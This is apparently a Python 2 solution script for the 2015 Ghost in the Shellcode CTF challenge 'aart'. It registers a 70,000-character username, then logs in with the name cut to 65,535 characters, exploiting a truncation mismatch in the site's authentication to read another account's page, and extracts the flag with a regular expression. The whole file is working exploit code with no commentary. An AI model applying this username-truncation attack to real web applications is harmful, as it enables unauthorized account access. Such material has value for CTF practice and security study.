#!/usr/bin/env python

import requests
import string
import re
import random

url_register = "http://aart.2015.ghostintheshellcode.com/register.php"
url_login = "http://aart.2015.ghostintheshellcode.com/login.php"


# Generate random username with length > 2^16
username = ''.join(random.choice(string.ascii_letters) for _ in range(70000))
password = '123'


# register with full username
data = { 'username' : username, 'password' : password }
requests.post(url_register, data=data)
print "[*] Registered"

# login with truncated username
data['username'] = username[:65535]
c = requests.post(url_login, data=data).content

flag = re.search(r"<h2>(.*)</h2>\s+<h2>", c, re.DOTALL).group(1)
print "[*] flag: '" + flag + "'"
